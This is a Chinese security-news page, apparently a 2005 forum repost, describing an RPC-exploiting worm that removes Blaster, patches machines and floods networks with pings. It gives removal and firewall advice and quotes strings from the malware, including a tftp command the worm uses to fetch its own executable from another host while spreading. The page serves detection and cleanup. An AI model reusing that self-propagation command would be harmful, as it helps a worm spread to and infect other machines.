 |
 |
■ 加入收藏 ■ 加入收藏 ■ 联系我们 |
|
| 文字广告: ppp |
| 当前位置 > 网络安全 > 安全技术 > 网络安全 最新RPC漏洞病毒.关于最近的疯狂ping
时间:2005-6-16 9:08:14 作者: 来源:中关村在线论坛点击数:
最新RPC漏洞病毒.关于最近的疯狂ping
该病毒的特点是将“冲击波”(Worm.Blaster)病 毒干掉,并在系统内值入,预防冲击波病毒的疫苗。 然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然 后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己, 消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意 作恶,病毒设定在2004年自行毁灭。 由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户, 设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。 如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒 SVCHOST.EXE 大小是19.2K DLLHOST.EXE 大小是10.K DLLHOST.EXE里面有这样的话! 引用: -------------------------------------------------------------------------------- =========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe winsSVCHOST.EXE |
|
|
|
|
|||||||||
